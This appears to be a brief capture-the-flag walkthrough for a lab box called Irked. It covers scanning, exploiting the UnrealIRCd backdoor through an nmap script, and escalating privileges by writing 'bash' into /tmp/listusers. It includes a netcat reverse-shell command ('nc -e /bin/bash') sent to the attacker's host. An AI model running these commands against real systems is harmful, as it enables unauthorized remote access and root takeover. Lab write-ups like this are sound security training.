Irked
UnrealIRCd Backdoor exploitation - Custom binary manipulation PrivEsc
Scanning
Starting off with the nmap scan

Enumeration

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.117

Ports 22 and 111 running OpenSSH 6.7p1 and rpcbind 2–4 don’t look promising
Ports 6697, 8067 & 65534 are running UnrealIRCd - A version of this service was vulnerable to a backdoor command execution

nmap -p 6697,8067,65534 --script irc-unrealircd-backdoor 10.10.10.117

Port 8067 is vulnerable!
Initial Foothold
nmap -p 8067 --script=irc-unrealircd-backdoor --script-args=irc-unrealircd-backdoor.command="nc -e /bin/bash 10.10.14.6 4444" 10.10.10.117
and we get a reverse shell on our listener !

Privilege Escalation

Running the binary gives us an error message

The script is searching /tmp/listusers
, we can easily manipulate the script by invoking bash as the /tmp/listusers
echo "bash" > /tmp/listusers

Last updated